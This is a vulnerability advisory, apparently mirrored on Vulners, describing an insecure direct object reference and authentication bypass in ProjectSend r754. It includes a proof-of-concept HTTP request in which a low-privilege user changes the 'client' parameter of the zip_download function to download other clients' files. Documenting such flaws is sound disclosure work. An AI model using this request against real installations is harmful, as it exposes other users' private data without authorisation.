Vulners
Lucene search
ProjectSend r754 - Insecure Direct Object Reference Vulnerability
Document Title:
===============
ProjectSend r754 - IDOR & Authentication Bypass Vulnerability
Product & Service Introduction:
===============================
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets
you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending
on external services or e-mail to send those files.
(Copy of the Homepage: http://www.projectsend.org/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a idor and authentication bypass vulnerability in the ProjectSend-r754 web-application.
Affected Product(s):
====================
GNU GPL License
Product: ProjectSend r754
Technical Details & Description:
================================
An insecure direct object references occured in case of an application provides direct access to objects based on user-supplied input.
As a result of this vulnerability attackers can bypass authorization and to access resources in the system. Insecure Direct Object References
allows attackers to bypass authorization and access resources directly by modifying the value of a parameter[client] used. Thus finally point
to other client account names, which allows an attackers to download others clients private data with no secure method provided.
Vulnerability Method(s):
[+] GET
Vulnerable Module(s):
[+] process.php?do=zip_download
Vulnerable Parameter(s):
[+] client
[+] file
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with low privilege web-application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
1. User "A" as attacker checks a file to download as zip extension, then click download to modifiy values as required ...
2. Application responds with the client file list, so then you are able to download all other side user B data files with zip extension
--- PoC Session Logs ---
GET /ProjectSend-r754/process.php?do=zip_download&client=[CLIENTNAME]&files%5B%5D=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://localhost/ProjectSend-r754/my_files/
Cookie: PHPSESSID=kb0uotq6mssklf213v4a7fje47
Connection: keep-alive
-
HTTP/1.1 200 OK
Date: Sun, 05 Feb 2017 19:07:41 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.44-0+deb7u1
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 6
Name of Files: .jpg
Video PoC:
https://www.youtube.com/watch?v=Xc6Jg9I7Pj4
# 0day.today [2018-01-05] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Feb 2017 00:00Current
7.1High risk
Vulners AI Score7.1